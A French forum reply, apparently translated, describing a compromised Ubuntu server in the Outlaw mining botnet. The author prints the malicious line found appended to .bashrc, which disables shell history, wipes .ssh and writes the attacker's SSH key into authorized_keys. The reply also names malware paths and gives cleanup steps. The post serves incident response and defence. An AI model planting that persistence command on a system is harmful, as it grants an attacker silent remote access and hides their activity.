La même chose m'est arrivée et je l'ai remarqué hier. J'ai vérifié le fichier /var/log/syslog
et cette IP (185.234.218.40) semblait exécuter automatiquement des cronjobs.
Je l'ai vérifié sur http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 ) et il contient des rapports. Ces fichiers ont été édités par le cheval de Troie:
- .bashrc
- .ssh / authorized_keys
J'ai trouvé ceci à la fin de .bashrc
(qui est exécuté chaque fois que bash est ouvert):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
Il supprime votre authorized_keys
fichier, qui est une liste de clés SSH autorisées à se connecter sans mot de passe. Ensuite, il ajoute la clé SSH de l'attaquant:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
De plus, j'ai trouvé ce dossier:, /tmp/.X13-unix/.rsync
où se trouvent tous les logiciels malveillants. J'ai même trouvé un fichier, /tmp/.X13-unix/.rsync/c/ip
un fichier contenant 70 000 adresses IP, qui sont probablement d'autres victimes ou serveurs de nœuds.
Il existe 2 solutions: A:
Ajoutez un pare-feu bloquant toutes les connexions sortantes à l'exception du port 22 et d'autres que vous jugez nécessaires et activez fail2ban, un programme qui interdit une adresse IP après l'échec de X tentatives de mot de passe
Tuez tous les travaux cron:,
ps aux | grep cron
puis tuez le PID qui s'affiche
Changez votre mot de passe en un mot de passe sécurisé
B:
Sauvegardez tous les fichiers ou dossiers dont vous avez besoin ou que vous souhaitez
Réinitialisez le serveur et réinstallez Ubuntu, ou créez directement une nouvelle droplet
Comme l'a dit Thom Wiggers, vous faites certainement partie d'un botnet de minage de bitcoins, et votre serveur a une porte dérobée . La porte dérobée utilise un exploit perl, un fichier situé ici:, /tmp/.X13-unix/.rsync/b/run
contenant ceci ( https://pastebin.com/ceP2jsUy )
Les dossiers les plus suspects que j'ai trouvés étaient:
Enfin, il y a un article relatif à la porte arrière Perl ici:
https://blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
J'espère que vous trouvez ça utile.
.firefoxcatche
n'a probablement rien à voir avec Firefox - pourrait-il s'agir simplement d'un mineur de bitcoin? Essayez de télécharger les exécutables sur virustotal.